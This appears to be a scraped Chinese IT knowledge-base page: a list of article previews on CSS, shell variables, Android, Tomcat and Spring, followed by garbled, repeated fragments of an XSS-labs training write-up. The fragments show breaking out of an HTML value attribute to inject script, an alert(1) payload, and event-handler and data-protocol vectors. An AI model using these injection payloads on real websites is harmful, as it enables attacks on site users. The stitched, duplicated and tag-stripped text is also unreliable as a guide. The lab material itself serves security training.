解决方案：CSS里&nbsp;&nbsp;&nbsp; *{margin:0;padding:0;} 
 
备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设</div>
                                </li>
                                <li><a href="/article/2458.htm"
                                       title="Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数" target="_blank">Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%24%23/1.htm">$#</a><a class="tag" taget="_blank" href="/search/%24%3F/1.htm">$?</a><a class="tag" taget="_blank" href="/search/%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F/1.htm">特殊变量</a>
                                    <div>前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码：   
 
  $echo $$  
   
运行结果 
29949 
&nbsp;  特殊变量列表   变量 含义   $0 当前脚本的文件名   $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个</div>
                                </li>
                                <li><a href="/article/2585.htm"
                                       title="程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!" target="_blank">程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/unix/1.htm">unix</a>
                                    <div>翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 
 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原</div>
                                </li>
                                <li><a href="/article/2712.htm"
                                       title="android Activity间List传值" target="_blank">android Activity间List传值</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>第一个Activity： 
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a</div>
                                </li>
                                <li><a href="/article/2839.htm"
                                       title="tomcat 设置java虚拟机内存" target="_blank">tomcat 设置java虚拟机内存</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tomcat+%E5%86%85%E5%AD%98%E8%AE%BE%E7%BD%AE/1.htm">tomcat 内存设置</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2117772 
http://eksliang.iteye.com/ 
常见的内存溢出有以下两种: 
java.lang.OutOfMemoryError: PermGen space  
java.lang.OutOfMemoryError: Java heap space 
&nbsp; 
------------</div>
                                </li>
                                <li><a href="/article/2966.htm"
                                       title="Android 数据库事务处理" target="_blank">Android 数据库事务处理</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事</div>
                                </li>
                                <li><a href="/article/3093.htm"
                                       title="Java 打开浏览器" target="_blank">Java 打开浏览器</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E7%BD%91%E5%9D%80/1.htm">打开网址</a><a class="tag" taget="_blank" href="/search/open%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">open浏览器</a><a class="tag" taget="_blank" href="/search/open+browser/1.htm">open browser</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80url/1.htm">打开url</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">打开浏览器</a>
                                    <div>使用java 语言如何打开浏览器呢? 
我们先研究下在cmd窗口中,如何打开网址 
使用IE 打开 
D:\software\bin&gt;cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 
使用火狐打开 
D:\software\bin&gt;cmd /c start firefox http://hw1287789</div>
                                </li>
                                <li><a href="/article/3220.htm"
                                       title="ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件" target="_blank">ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a><a class="tag" taget="_blank" href="/search/google+api/1.htm">google api</a><a class="tag" taget="_blank" href="/search/chrome%E6%8F%92%E4%BB%B6/1.htm">chrome插件</a>
                                    <div>Chrome Web Store 安装地址：&nbsp;https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 
 
 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧</div>
                                </li>
                                <li><a href="/article/3347.htm"
                                       title="进程VS.线程" target="_blank">进程VS.线程</a>
                                    <span class="text-muted">m635674608</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a>
                                    <div>资料来源： 
http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点： 
多进程模式最大</div>
                                </li>
                                <li><a href="/article/3474.htm"
                                       title="Linux下安装MemCached" target="_blank">Linux下安装MemCached</a>
                                    <span class="text-muted">字符串</span>
<a class="tag" taget="_blank" href="/search/memcached/1.htm">memcached</a>
                                    <div>前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n</div>
                                </li>
                                <li><a href="/article/3601.htm"
                                       title="java设计模式之--jdk动态代理（实现aop编程）" target="_blank">java设计模式之--jdk动态代理（实现aop编程）</a>
                                    <span class="text-muted">Supanccy2013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>&nbsp;&nbsp;&nbsp; 与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 
&</div>
                                </li>
                                <li><a href="/article/3728.htm"
                                       title="Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持" target="_blank">Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>2.1 默认方法(default method) 
 
 java8引入了一个default medthod; 
 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 
 使用default关键字 
 Spring 4.2支持加载在默认方法里声明的bean 
  
2.2 
 
 将要被声明成bean的类 
  
public class DemoService {
    </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1

Level2 【参数】

"> 就会实现xss注入
所以payload 就是

`">`

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1alert(1)

Level2 【参数】

标签</h3> <pre><code>value="1"> 如果我们自己将其闭合呢 我们输入 "> 就会变为 value="">"> 这里 其实就是 value=""> "> 然后我们构造恶意代码 value=""><script>alert(1) "> 就会实现xss注入 所以payload 就是 ">alert(1)

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

欢迎用户test1

"> 就会实现xss注入
所以payload 就是

`">`